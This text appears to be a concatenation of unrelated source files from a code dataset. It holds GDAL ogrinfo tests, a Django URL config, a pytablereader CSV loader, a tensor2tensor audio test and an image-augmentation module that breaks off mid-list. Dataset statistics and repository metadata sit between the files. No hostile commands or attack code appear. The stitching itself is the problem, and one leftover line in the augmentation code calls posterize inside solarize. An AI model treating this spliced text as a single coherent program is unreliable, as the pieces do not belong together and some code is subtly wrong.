def test_ogrinfo_19():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' --formats', check_memleak = False )
if ret.find('"ESRI Shapefile" (read/write)') < 0:
print(ret)
return 'fail'
return 'success'
###############################################################################
# Test --help-general
def test_ogrinfo_20():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' --help-general', check_memleak = False )
if ret.find('Generic GDAL/OGR utility command options') < 0:
print(ret)
return 'fail'
return 'success'
###############################################################################
# Test --locale
def test_ogrinfo_21():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' --locale C ../ogr/data/poly.shp', check_memleak = False )
if ret.find("ESRI Shapefile") < 0:
print(ret)
return 'fail'
return 'success'
###############################################################################
# Test RFC 41 support
def test_ogrinfo_22():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
f = open('tmp/test_ogrinfo_22.csv', 'wt')
f.write('_WKTgeom1_EPSG_4326,_WKTgeom2_EPSG_32631\n')
f.write('"POINT(1 2)","POINT(3 4)"\n')
f.close()
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' tmp/test_ogrinfo_22.csv', check_memleak = False )
if ret.find('1: test_ogrinfo_22 (Unknown (any), Unknown (any))') < 0:
print(ret)
return 'fail'
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' -al tmp/test_ogrinfo_22.csv', check_memleak = False )
expected_ret = """INFO: Open of `tmp/test_ogrinfo_22.csv'
using driver `CSV' successful.
Layer name: test_ogrinfo_22
Geometry (geom__WKTgeom1_EPSG_4326): Unknown (any)
Geometry (geom__WKTgeom2_EPSG_32631): Unknown (any)
Feature Count: 1
Extent (geom__WKTgeom1_EPSG_4326): (1.000000, 2.000000) - (1.000000, 2.000000)
Extent (geom__WKTgeom2_EPSG_32631): (3.000000, 4.000000) - (3.000000, 4.000000)
SRS WKT (geom__WKTgeom1_EPSG_4326):
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.0174532925199433,
AUTHORITY["EPSG","9122"]],
AUTHORITY["EPSG","4326"]]
SRS WKT (geom__WKTgeom2_EPSG_32631):
PROJCS["WGS 84 / UTM zone 31N",
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.0174532925199433,
AUTHORITY["EPSG","9122"]],
AUTHORITY["EPSG","4326"]],
PROJECTION["Transverse_Mercator"],
PARAMETER["latitude_of_origin",0],
PARAMETER["central_meridian",3],
PARAMETER["scale_factor",0.9996],
PARAMETER["false_easting",500000],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]],
AXIS["Easting",EAST],
AXIS["Northing",NORTH],
AUTHORITY["EPSG","32631"]]
Geometry Column 1 = geom__WKTgeom1_EPSG_4326
Geometry Column 2 = geom__WKTgeom2_EPSG_32631
_WKTgeom1_EPSG_4326: String (0.0)
_WKTgeom2_EPSG_32631: String (0.0)
OGRFeature(test_ogrinfo_22):1
_WKTgeom1_EPSG_4326 (String) = POINT(1 2)
_WKTgeom2_EPSG_32631 (String) = POINT(3 4)
geom__WKTgeom1_EPSG_4326 = POINT (1 2)
geom__WKTgeom2_EPSG_32631 = POINT (3 4)
"""
expected_lines = expected_ret.splitlines()
lines = ret.splitlines()
for i in range(len(expected_lines)):
if expected_lines[i] != lines[i]:
print(ret)
return 'fail'
os.unlink('tmp/test_ogrinfo_22.csv')
return 'success'
###############################################################################
# Test -geomfield (RFC 41) support
def test_ogrinfo_23():
if test_cli_utilities.get_ogrinfo_path() is None:
return 'skip'
f = open('tmp/test_ogrinfo_23.csv', 'wt')
f.write('_WKTgeom1_EPSG_4326,_WKTgeom2_EPSG_32631\n')
f.write('"POINT(1 2)","POINT(3 4)"\n')
f.write('"POINT(3 4)","POINT(1 2)"\n')
f.close()
ret = gdaltest.runexternal(test_cli_utilities.get_ogrinfo_path() + ' -al tmp/test_ogrinfo_23.csv -spat 1 2 1 2 -geomfield geom__WKTgeom2_EPSG_32631', check_memleak = False )
expected_ret = """INFO: Open of `tmp/test_ogrinfo_23.csv'
using driver `CSV' successful.
Layer name: test_ogrinfo_23
Geometry (geom__WKTgeom1_EPSG_4326): Unknown (any)
Geometry (geom__WKTgeom2_EPSG_32631): Unknown (any)
Feature Count: 1
Extent (geom__WKTgeom1_EPSG_4326): (3.000000, 4.000000) - (3.000000, 4.000000)
Extent (geom__WKTgeom2_EPSG_32631): (1.000000, 2.000000) - (1.000000, 2.000000)
SRS WKT (geom__WKTgeom1_EPSG_4326):
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.0174532925199433,
AUTHORITY["EPSG","9122"]],
AUTHORITY["EPSG","4326"]]
SRS WKT (geom__WKTgeom2_EPSG_32631):
PROJCS["WGS 84 / UTM zone 31N",
GEOGCS["WGS 84",
DATUM["WGS_1984",
SPHEROID["WGS 84",6378137,298.257223563,
AUTHORITY["EPSG","7030"]],
AUTHORITY["EPSG","6326"]],
PRIMEM["Greenwich",0,
AUTHORITY["EPSG","8901"]],
UNIT["degree",0.0174532925199433,
AUTHORITY["EPSG","9122"]],
AUTHORITY["EPSG","4326"]],
PROJECTION["Transverse_Mercator"],
PARAMETER["latitude_of_origin",0],
PARAMETER["central_meridian",3],
PARAMETER["scale_factor",0.9996],
PARAMETER["false_easting",500000],
PARAMETER["false_northing",0],
UNIT["metre",1,
AUTHORITY["EPSG","9001"]],
AXIS["Easting",EAST],
AXIS["Northing",NORTH],
AUTHORITY["EPSG","32631"]]
Geometry Column 1 = geom__WKTgeom1_EPSG_4326
Geometry Column 2 = geom__WKTgeom2_EPSG_32631
_WKTgeom1_EPSG_4326: String (0.0)
_WKTgeom2_EPSG_32631: String (0.0)
OGRFeature(test_ogrinfo_23):2
_WKTgeom1_EPSG_4326 (String) = POINT(3 4)
_WKTgeom2_EPSG_32631 (String) = POINT(1 2)
geom__WKTgeom1_EPSG_4326 = POINT (3 4)
geom__WKTgeom2_EPSG_32631 = POINT (1 2)
"""
expected_lines = expected_ret.splitlines()
lines = ret.splitlines()
for i in range(len(expected_lines)):
if expected_lines[i] != lines[i]:
print(ret)
return 'fail'
os.unlink('tmp/test_ogrinfo_23.csv')
return 'success'
gdaltest_list = [
test_ogrinfo_1,
test_ogrinfo_2,
test_ogrinfo_3,
test_ogrinfo_4,
test_ogrinfo_5,
test_ogrinfo_6,
test_ogrinfo_7,
test_ogrinfo_8,
test_ogrinfo_9,
test_ogrinfo_10,
test_ogrinfo_11,
test_ogrinfo_12,
test_ogrinfo_13,
test_ogrinfo_14,
test_ogrinfo_15,
test_ogrinfo_16,
test_ogrinfo_17,
test_ogrinfo_18,
test_ogrinfo_19,
test_ogrinfo_20,
test_ogrinfo_21,
test_ogrinfo_22,
test_ogrinfo_23,
]
if __name__ == '__main__':
gdaltest.setup_run( 'test_ogrinfo' )
gdaltest.run_tests( gdaltest_list )
gdaltest.summarize()
| 32.639085
| 177
| 0.587788
|
3b2c805bec1393566901d694bb93b78f8c6fe545
| 394
|
py
|
Python
|
museum_api/urls.py
|
DrDos0016/museum-of-zzt
|
0caa1cbeb2e0ab22206e72bc4ecf4c1b66c25fc4
|
[
"MIT"
] | 2
|
2020-01-05T08:32:51.000Z
|
2021-07-27T06:36:40.000Z
|
museum_api/urls.py
|
DrDos0016/museum-of-zzt
|
0caa1cbeb2e0ab22206e72bc4ecf4c1b66c25fc4
|
[
"MIT"
] | 26
|
2020-02-11T22:10:43.000Z
|
2022-02-03T20:54:08.000Z
|
museum_api/urls.py
|
DrDos0016/museum-of-zzt
|
0caa1cbeb2e0ab22206e72bc4ecf4c1b66c25fc4
|
[
"MIT"
] | null | null | null |
from django.urls import path
import museum_api.endpoints
urlpatterns = [
path("worlds-of-zzt/", museum_api.endpoints.worlds_of_zzt, name="api_wozzt"),
path("v1/get/file/", museum_api.endpoints.get_file, name="api_get_file"),
path("v1/help/", museum_api.endpoints.help, name="api_help"),
path("v1/search/files/", museum_api.endpoints.search_files, name="api_search_files"),
]
| 32.833333
| 89
| 0.733503
|
8774ba3de9d084ca883a12f97c8df3c5a1f9be8a
| 7,083
|
py
|
Python
|
pytablereader/csv/core.py
|
sthagen/thombashi-pytablereader
|
b59859da6fdcc94035933dd253e6e380b04a233b
|
[
"MIT"
] | 81
|
2017-03-18T02:57:29.000Z
|
2022-03-26T16:54:59.000Z
|
pytablereader/csv/core.py
|
sthagen/pytablereader
|
b59859da6fdcc94035933dd253e6e380b04a233b
|
[
"MIT"
] | 4
|
2017-08-09T14:58:48.000Z
|
2020-04-17T12:59:29.000Z
|
pytablereader/csv/core.py
|
sthagen/pytablereader
|
b59859da6fdcc94035933dd253e6e380b04a233b
|
[
"MIT"
] | 11
|
2017-05-02T16:23:59.000Z
|
2021-12-10T15:05:39.000Z
|
"""
.. codeauthor:: Tsuyoshi Hombashi <tsuyoshi.hombashi@gmail.com>
"""
import csv
import io
import warnings
import typepy
from mbstrdecoder import MultiByteStrDecoder
from pytablereader import DataError
from .._common import get_file_encoding
from .._constant import TableNameTemplate as tnt
from .._logger import FileSourceLogger, TextSourceLogger
from .._validator import FileValidator, TextValidator
from ..interface import AbstractTableReader
from .formatter import CsvTableFormatter
class CsvTableLoader(AbstractTableReader):
"""
The abstract class of CSV table loaders.
.. py:attribute:: headers
Attribute names of the table. Use the first line of
the CSV file as attribute list if ``headers`` is empty.
.. py:attribute:: delimiter
A one-character string used to separate fields.
Defaults to ``","``.
.. py:attribute:: quotechar
A one-character string used to quote fields containing
special characters, such as the ``delimiter`` or ``quotechar``,
or which contain new-line characters.
Defaults to ``'"'``.
.. py:attribute:: encoding
Encoding of the CSV data.
"""
@property
def format_name(self):
return "csv"
@property
def delimiter(self):
# "delimiter" must be a string, not an unicode
return str(MultiByteStrDecoder(self.__delimiter).unicode_str)
@delimiter.setter
def delimiter(self, value):
self.__delimiter = value
@property
def quotechar(self):
# "quotechar" must be a string, not an unicode
return str(MultiByteStrDecoder(self.__quotechar).unicode_str)
@quotechar.setter
def quotechar(self, value):
self.__quotechar = value
@property
def header_list(self):
warnings.warn("'header_list' has moved to 'headers'", DeprecationWarning)
return self.headers
@header_list.setter
def header_list(self, value):
warnings.warn("'header_list' has moved to 'headers'", DeprecationWarning)
self.headers = value
def __init__(self, source, quoting_flags, type_hints, type_hint_rules):
super().__init__(source, quoting_flags, type_hints, type_hint_rules)
self._csv_reader = None
self.headers = ()
self.delimiter = ","
self.quotechar = '"'
self.encoding = None
def _to_data_matrix(self):
try:
return [
[self.__modify_item(data, col) for col, data in enumerate(row)]
for row in self._csv_reader
if typepy.is_not_empty_sequence(row)
]
except (csv.Error, UnicodeDecodeError) as e:
raise DataError(e)
def __modify_item(self, data, col: int):
if self.type_hints and (col in self.type_hints):
try:
return self.type_hints[col](data).convert()
except typepy.TypeConversionError:
pass
return MultiByteStrDecoder(data).unicode_str
class CsvTableFileLoader(CsvTableLoader):
"""
A file loader class to extract tabular data from CSV files.
:param str file_path: Path to the loading CSV file.
.. py:attribute:: table_name
Table name string. Defaults to ``%(filename)s``.
:Examples:
:ref:`example-csv-table-loader`
"""
def __init__(self, file_path, quoting_flags=None, type_hints=None, type_hint_rules=None):
super().__init__(file_path, quoting_flags, type_hints, type_hint_rules)
self._validator = FileValidator(file_path)
self._logger = FileSourceLogger(self)
def load(self):
"""
Extract tabular data as |TableData| instances from a CSV file.
|load_source_desc_file|
:return:
Loaded table data.
|load_table_name_desc|
=================== ========================================
Format specifier Value after the replacement
=================== ========================================
``%(filename)s`` |filename_desc|
``%(format_name)s`` ``"csv"``
``%(format_id)s`` |format_id_desc|
``%(global_id)s`` |global_id|
=================== ========================================
:rtype: |TableData| iterator
:raises pytablereader.DataError:
If the CSV data is invalid.
.. seealso::
:py:func:`csv.reader`
"""
self._validate()
self._logger.logging_load()
self.encoding = get_file_encoding(self.source, self.encoding)
self._csv_reader = csv.reader(
open(self.source, encoding=self.encoding),
delimiter=self.delimiter,
quotechar=self.quotechar,
strict=True,
skipinitialspace=True,
)
formatter = CsvTableFormatter(self._to_data_matrix())
formatter.accept(self)
return formatter.to_table_data()
def _get_default_table_name_template(self):
return tnt.FILENAME
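# Usage sketch for CsvTableFileLoader (assumes a local "sample.csv" file; the
# path is illustrative only):
#
#   loader = CsvTableFileLoader("sample.csv")
#   for table_data in loader.load():
#       print(table_data)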
class CsvTableTextLoader(CsvTableLoader):
"""
A text loader class to extract tabular data from CSV text data.
:param str text: CSV text to load.
.. py:attribute:: table_name
Table name string. Defaults to ``%(format_name)s%(format_id)s``.
:Examples:
:ref:`example-csv-table-loader`
"""
def __init__(self, text, quoting_flags=None, type_hints=None, type_hint_rules=None):
super().__init__(text, quoting_flags, type_hints, type_hint_rules)
self._validator = TextValidator(text)
self._logger = TextSourceLogger(self)
def load(self):
"""
Extract tabular data as |TableData| instances from a CSV text object.
|load_source_desc_text|
:return:
Loaded table data.
|load_table_name_desc|
=================== ========================================
Format specifier Value after the replacement
=================== ========================================
``%(filename)s`` ``""``
``%(format_name)s`` ``"csv"``
``%(format_id)s`` |format_id_desc|
``%(global_id)s`` |global_id|
=================== ========================================
:rtype: |TableData| iterator
:raises pytablereader.DataError:
If the CSV data is invalid.
.. seealso::
:py:func:`csv.reader`
"""
self._validate()
self._logger.logging_load()
self._csv_reader = csv.reader(
io.StringIO(self.source.strip()),
delimiter=self.delimiter,
quotechar=self.quotechar,
strict=True,
skipinitialspace=True,
)
formatter = CsvTableFormatter(self._to_data_matrix())
formatter.accept(self)
return formatter.to_table_data()
def _get_default_table_name_template(self):
return f"{tnt.FORMAT_NAME:s}{tnt.FORMAT_ID:s}"
| 29.760504
| 93
| 0.585486
|
ff94e44306b17bcfe72a1f62095067b676385cae
| 1,932
|
py
|
Python
|
tensor2tensor/data_generators/audio_test.py
|
SamuelmsWong/tensor2tensor
|
7172ad8dc5f1d8f8c0e21cbb831ae2657387a2af
|
[
"Apache-2.0"
] | 3
|
2021-01-19T20:21:15.000Z
|
2021-01-19T21:36:37.000Z
|
tensor2tensor/data_generators/audio_test.py
|
SamuelmsWong/tensor2tensor
|
7172ad8dc5f1d8f8c0e21cbb831ae2657387a2af
|
[
"Apache-2.0"
] | null | null | null |
tensor2tensor/data_generators/audio_test.py
|
SamuelmsWong/tensor2tensor
|
7172ad8dc5f1d8f8c0e21cbb831ae2657387a2af
|
[
"Apache-2.0"
] | 1
|
2021-05-03T17:34:21.000Z
|
2021-05-03T17:34:21.000Z
|
# coding=utf-8
# Copyright 2020 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tensor2tensor.data_generators.audio."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import io
import os
from tensor2tensor.data_generators import audio
import tensorflow.compat.v1 as tf
class AudioTest(tf.test.TestCase):
def testDataCollection(self):
# Generate a trivial source and target file.
tmp_dir = self.get_temp_dir()
test_files = [
"dir1/file1",
"dir1/file2",
"dir1/dir2/file3",
"dir1/dir2/dir3/file4",
]
for filename in test_files:
input_filename = os.path.join(tmp_dir, filename + ".WAV")
target_filename = os.path.join(tmp_dir, filename + ".WRD")
directories = os.path.dirname(input_filename)
if not os.path.exists(directories):
os.makedirs(directories)
io.open(input_filename, "wb")
io.open(target_filename, "wb")
data_dict = audio._collect_data(tmp_dir, ".WAV", ".WRD")
expected = [os.path.join(tmp_dir, filename) for filename in test_files]
self.assertEqual(sorted(list(data_dict)), sorted(expected))
# Clean up.
for filename in test_files:
os.remove(os.path.join(tmp_dir, "%s.WAV" % filename))
os.remove(os.path.join(tmp_dir, "%s.WRD" % filename))
if __name__ == "__main__":
tf.test.main()
| 31.672131
| 75
| 0.710145
|
5aee13bb4438e8b32d22316f5acb1ec9332c9fbf
| 19,233
|
py
|
Python
|
autoaugment.py
|
rosinality/vision-transformers-pytorch
|
b884b5da79900c96e4ce17fbb575cf1c5cb3cd5f
|
[
"MIT"
] | 77
|
2021-04-03T06:44:19.000Z
|
2021-07-07T07:05:01.000Z
|
autoaugment.py
|
rosinality/vision-transformers-pytorch
|
b884b5da79900c96e4ce17fbb575cf1c5cb3cd5f
|
[
"MIT"
] | 1
|
2021-04-08T06:59:41.000Z
|
2021-04-08T11:20:32.000Z
|
autoaugment.py
|
rosinality/vision-transformers-pytorch
|
b884b5da79900c96e4ce17fbb575cf1c5cb3cd5f
|
[
"MIT"
] | 6
|
2021-04-15T13:36:37.000Z
|
2022-02-03T12:32:20.000Z
|
import random
import math
import torch
from PIL import Image, ImageOps, ImageEnhance, ImageDraw
from torchvision.transforms import functional as F
import transforms
from transforms import check_prob, PIL_INTER_MAP, RandomTransform
def rescale_float(level, max_val, param_max=10):
return float(level) * max_val / param_max
def rescale_int(level, max_val, param_max=10):
return int(level * max_val / param_max)
def random_mirror(mirror, val):
if mirror and check_prob(0.5):
val *= -1
return val
def apply_affine(img, translate, shear, resample, fillcolor):
trans_x, trans_y = translate
shear_x, shear_y = shear
return img.transform(
img.size,
Image.AFFINE,
(1, shear_x, trans_x, shear_y, 1, trans_y),
resample,
fillcolor=fillcolor,
)
class AutoAugmentAffine(RandomTransform):
def __init__(self, mirror=True, resample=Image.NEAREST, fillcolor=None, p=1.0):
super().__init__(p)
self.mirror = mirror
self.resample = resample
self.fillcolor = fillcolor
def _mirror(self, val):
if self.mirror and check_prob(0.5):
val *= -1
return val
def _repr_params(self):
params = dict(self.__dict__)
params["resample"] = PIL_INTER_MAP[self.resample]
return params
def _apply_img_fn(self, img, translate, shear):
trans_x, trans_y = translate
shear_x, shear_y = shear
return img.transform(
img.size,
Image.AFFINE,
(1, shear_x, trans_x, shear_y, 1, trans_y),
self.resample,
fillcolor=self.fillcolor,
)
def shear_x(img, shear_x, mirror=True, resample=Image.NEAREST, fillcolor=None):
shear_x = random_mirror(mirror, shear_x)
return apply_affine(img, (0, 0), (shear_x, 0), resample, fillcolor)
    # Unreachable in the original: F.affine(img, angle=0.0, translate=(0, 0), scale=1.0,
    #     shear=(math.degrees(shear_x), 0.0), resample=resample, fillcolor=fillcolor)
def shear_y(img, shear_y, mirror=True, resample=Image.NEAREST, fillcolor=None):
shear_y = random_mirror(mirror, shear_y)
return apply_affine(img, (0, 0), (0, shear_y), resample, fillcolor)
    # Unreachable in the original: F.affine(img, angle=0.0, translate=(0, 0), scale=1.0,
    #     shear=(0, math.degrees(shear_y)), resample=resample, fillcolor=fillcolor)
def translate_x(img, translate_x, mirror=True, resample=Image.NEAREST, fillcolor=None):
translate_x = random_mirror(mirror, translate_x)
return apply_affine(img, (translate_x, 0), (0, 0), resample, fillcolor)
    # Unreachable in the original: F.affine(img, angle=0.0, translate=(translate_x, 0),
    #     scale=1.0, shear=(0, 0), resample=resample, fillcolor=fillcolor)
def translate_y(img, translate_y, mirror=True, resample=Image.NEAREST, fillcolor=None):
translate_y = random_mirror(mirror, translate_y)
return apply_affine(img, (0, translate_y), (0, 0), resample, fillcolor)
    # Unreachable in the original: F.affine(img, angle=0.0, translate=(0, translate_y),
    #     scale=1.0, shear=(0, 0), resample=resample, fillcolor=fillcolor)
def rotate(img, rotate, mirror=True, resample=Image.NEAREST, fillcolor=None):
rotate = random_mirror(mirror, rotate)
return img.rotate(rotate, resample=resample, fillcolor=fillcolor)
    # Unreachable in the original: F.rotate(img, rotate, resample=resample, fillcolor=fillcolor)
def posterize(img, bits):
return ImageOps.posterize(img, bits)
    # Unreachable in the original: F.posterize(img, bits)
def cutout(img, size, fillcolor=None):
if isinstance(img, torch.Tensor):
pass
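        # Tensor inputs are currently passed through unchanged; cutout is only
        # implemented for PIL images in the branch below.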
else:
x = random.random()
y = random.random()
w, h = img.size
c_x = int(x * w)
c_y = int(y * h)
x0 = max(0, c_x - size)
x1 = w - max(0, w - c_x - size) - 1
y0 = max(0, c_y - size)
y1 = h - max(0, h - c_y - size) - 1
xy = (x0, y0, x1, y1)
img = img.copy()
ImageDraw.Draw(img).rectangle(xy, fillcolor)
return img
def solarize(img, threshold):
return ImageOps.solarize(img, threshold)
    # The original had an unreachable line calling F.posterize(img, solarize) here,
    # most likely a copy-paste slip for F.solarize(img, threshold).
def solarize_add(img, add, threshold=128):
if isinstance(img, torch.Tensor):
mask = img < threshold
solarized = img.clamp(max=255 - add) + add
result = mask * solarized + ~mask * img
return result
else:
lut = []
for i in range(256):
if i < threshold:
lut.append(min(255, i + add))
else:
lut.append(i)
if img.mode in ("L", "RGB"):
if img.mode == "RGB" and len(lut) == 256:
lut = lut + lut + lut
return img.point(lut)
else:
return img
def saturation(img, saturate):
return ImageEnhance.Color(img).enhance(saturate)
    # The original had an unreachable line referencing an undefined name
    # (F.adjust_saturation(img, saturate_value)); `saturate` was presumably intended.
def contrast(img, contrast):
return ImageEnhance.Contrast(img).enhance(contrast)
    # Unreachable in the original: F.adjust_contrast(img, contrast)
def brightness(img, brightness):
return ImageEnhance.Brightness(img).enhance(brightness)
    # Unreachable in the original: F.adjust_brightness(img, brightness)
def sharpness(img, sharpness):
return ImageEnhance.Sharpness(img).enhance(sharpness)
    # Unreachable in the original: F.adjust_sharpness(img, sharpness)
def invert(img):
return ImageOps.invert(img)
    # Unreachable in the original: F.invert(img)
def auto_contrast(img):
return ImageOps.autocontrast(img)
    # Unreachable in the original: F.autocontrast(img)
def equalize(img):
return ImageOps.equalize(img)
    # Unreachable in the original: F.equalize(img)
class ShearX(AutoAugmentAffine):
def __init__(
self, shear_x, mirror=True, resample=Image.NEAREST, fillcolor=None, p=1.0
):
super().__init__(mirror=mirror, resample=resample, fillcolor=fillcolor, p=p)
self.shear_x = shear_x
def sample(self):
shear_x = self._mirror(self.shear_x)
return {"shear_x": shear_x}
def _apply_img(self, img, shear_x):
return self._apply_img_fn(img, (0, 0), (shear_x, 0))
class ShearY(AutoAugmentAffine):
def __init__(
self, shear_y, mirror=True, resample=Image.NEAREST, fillcolor=None, p=1.0
):
super().__init__(mirror=mirror, resample=resample, fillcolor=fillcolor, p=p)
self.shear_y = shear_y
def sample(self):
shear_y = self._mirror(self.shear_y)
return {"shear_y": shear_y}
def _apply_img(self, img, shear_y):
return self._apply_img_fn(img, (0, 0), (0, shear_y))
class TranslateX(AutoAugmentAffine):
def __init__(
self, translate_x, mirror=True, resample=Image.NEAREST, fillcolor=None, p=1.0
):
super().__init__(mirror=mirror, resample=resample, fillcolor=fillcolor, p=p)
self.translate_x = translate_x
def sample(self):
trans_x = self._mirror(self.translate_x)
return {"translate_x": trans_x}
def _apply_img(self, img, translate_x):
return self._apply_img_fn(img, (translate_x, 0), (0, 0))
class TranslateY(AutoAugmentAffine):
def __init__(
self, translate_y, mirror=True, resample=Image.NEAREST, fillcolor=None, p=1.0
):
super().__init__(mirror=mirror, resample=resample, fillcolor=fillcolor, p=p)
self.translate_y = translate_y
def sample(self):
trans_y = self._mirror(self.translate_y)
return {"translate_y": trans_y}
def _apply_img(self, img, translate_y):
return self._apply_img_fn(img, (0, translate_y), (0, 0))
class Rotate(AutoAugmentAffine):
def __init__(
self, rotate, mirror=True, resample=Image.NEAREST, fillcolor=None, p=1.0
):
super().__init__(mirror=mirror, resample=resample, fillcolor=fillcolor, p=p)
self.rotate = rotate
def sample(self):
rotate = self._mirror(self.rotate)
return {"rotate": rotate}
def _apply_img(self, img, rotate):
return img.rotate(rotate, resample=self.resample, fillcolor=self.fillcolor)
class Posterize(RandomTransform):
def __init__(self, bits, p=1.0):
super().__init__(p)
self.bits = bits
def sample(self):
return {"bits": self.bits}
def _apply_img(self, img, bits):
return ImageOps.posterize(img, bits)
class Cutout(RandomTransform):
def __init__(self, size, fillcolor=(0, 0, 0), p=1.0):
super().__init__(p)
self.size = size
self.fillcolor = fillcolor
def sample(self):
x = random.random()
y = random.random()
return {"center": (x, y)}
def _apply_img(self, img, center):
w, h = img.size
c_x = int(center[0] * w)
c_y = int(center[1] * h)
x0 = max(0, c_x - self.size)
x1 = w - max(0, w - c_x - self.size) - 1
y0 = max(0, c_y - self.size)
y1 = h - max(0, h - c_y - self.size) - 1
xy = (x0, y0, x1, y1)
img = img.copy()
ImageDraw.Draw(img).rectangle(xy, self.fillcolor)
return img
class Solarize(RandomTransform):
def __init__(self, threshold, p=1.0):
super().__init__(p)
self.threshold = threshold
def sample(self):
return {"threshold": self.threshold}
def _apply_img(self, img, threshold):
return ImageOps.solarize(img, threshold)
class SolarizeAdd(RandomTransform):
def __init__(self, add, threshold=128, p=1.0):
super().__init__(p)
self.add = add
self.threshold = threshold
def sample(self):
return {"add": self.add, "threshold": self.threshold}
def _apply_img(self, img, add, threshold):
return solarize_add(img, add, threshold)
class Saturation(RandomTransform):
def __init__(self, saturation, p=1.0):
super().__init__(p)
self.saturation = saturation
def sample(self):
return {"saturation": self.saturation}
def _apply_img(self, img, saturation):
return ImageEnhance.Color(img).enhance(saturation)
class Contrast(RandomTransform):
def __init__(self, contrast, p=1.0):
super().__init__(p)
self.contrast = contrast
def sample(self):
return {"contrast": self.contrast}
def _apply_img(self, img, contrast):
return ImageEnhance.Contrast(img).enhance(contrast)
class Brightness(RandomTransform):
def __init__(self, brightness, p=1.0):
super().__init__(p)
self.brightness = brightness
def sample(self):
return {"brightness": self.brightness}
def _apply_img(self, img, brightness):
return ImageEnhance.Brightness(img).enhance(brightness)
class Sharpness(RandomTransform):
def __init__(self, sharpness, p=1.0):
super().__init__(p)
self.sharpness = sharpness
def sample(self):
return {"sharpness": self.sharpness}
def _apply_img(self, img, sharpness):
return ImageEnhance.Sharpness(img).enhance(sharpness)
def reparam_shear(level):
return rescale_float(level, 0.3)
def reparam_translate(level, max_translate):
return rescale_int(level, max_translate)
def reparam_rotate(level):
return rescale_int(level, 30)
def reparam_solarize(level):
return rescale_int(level, 256)
def reparam_solarize_increasing(level):
return 256 - rescale_int(level, 256)
def reparam_posterize(level):
return rescale_int(level, 4)
def reparam_posterize_increasing(level):
return 4 - rescale_int(level, 4)
def reparam_color(level):
return rescale_float(level, 1.8) + 0.1
def reparam_cutout(level, cutout):
return rescale_int(level, cutout)
def reparam_solarize_add(level):
return rescale_int(level, 110)
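# Each entry below maps an op name to (transform class, functional form, magnitude
# re-parameterization); a re-parameterization of None means the op takes no magnitude.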
AUTOAUGMENT_MAP = {
"ShearX": (ShearX, shear_x, reparam_shear),
"ShearY": (ShearY, shear_y, reparam_shear),
"TranslateX": (TranslateX, translate_x, reparam_translate),
"TranslateY": (TranslateY, translate_y, reparam_translate),
"Rotate": (Rotate, rotate, reparam_rotate),
"Solarize": (Solarize, solarize, reparam_solarize),
"SolarizeIncreasing": (Solarize, solarize, reparam_solarize_increasing),
"Posterize": (Posterize, posterize, reparam_posterize),
"PosterizeIncreasing": (Posterize, posterize, reparam_posterize_increasing),
"Contrast": (Contrast, contrast, reparam_color),
"Color": (Saturation, saturation, reparam_color),
"Brightness": (Brightness, brightness, reparam_color),
"Sharpness": (Sharpness, sharpness, reparam_color),
"Invert": (transforms.Invert, invert, None),
"AutoContrast": (transforms.AutoContrast, auto_contrast, None),
"Equalize": (transforms.Equalize, equalize, None),
"Cutout": (Cutout, cutout, reparam_cutout),
"SolarizeAdd": (SolarizeAdd, solarize_add, reparam_solarize_add),
}
def autoaugment_policy():
policy_list = [
[("PosterizeIncreasing", 0.4, 8), ("Rotate", 0.6, 9)],
[("SolarizeIncreasing", 0.6, 5), ("AutoContrast", 0.6, 5)],
[("Equalize", 0.8, 8), ("Equalize", 0.6, 3)],
[("PosterizeIncreasing", 0.6, 7), ("PosterizeIncreasing", 0.6, 6)],
[("Equalize", 0.4, 7), ("SolarizeIncreasing", 0.2, 4)],
[("Equalize", 0.4, 4), ("Rotate", 0.8, 8)],
[("SolarizeIncreasing", 0.6, 3), ("Equalize", 0.6, 7)],
[("PosterizeIncreasing", 0.8, 5), ("Equalize", 1.0, 2)],
[("Rotate", 0.2, 3), ("SolarizeIncreasing", 0.6, 8)],
[("Equalize", 0.6, 8), ("PosterizeIncreasing", 0.4, 6)],
[("Rotate", 0.8, 8), ("Color", 0.4, 0)],
[("Rotate", 0.4, 9), ("Equalize", 0.6, 2)],
[("Equalize", 0.0, 7), ("Equalize", 0.8, 8)],
[("Invert", 0.6, 4), ("Equalize", 1.0, 8)],
[("Color", 0.6, 4), ("Contrast", 1.0, 8)],
[("Rotate", 0.8, 8), ("Color", 1.0, 0)],
[("Color", 0.8, 8), ("SolarizeIncreasing", 0.8, 7)],
[("Sharpness", 0.4, 7), ("Invert", 0.6, 8)],
[("ShearX", 0.6, 5), ("Equalize", 1.0, 9)],
[("Color", 0.4, 0), ("Equalize", 0.6, 3)],
[("Equalize", 0.4, 7), ("SolarizeIncreasing", 0.2, 4)],
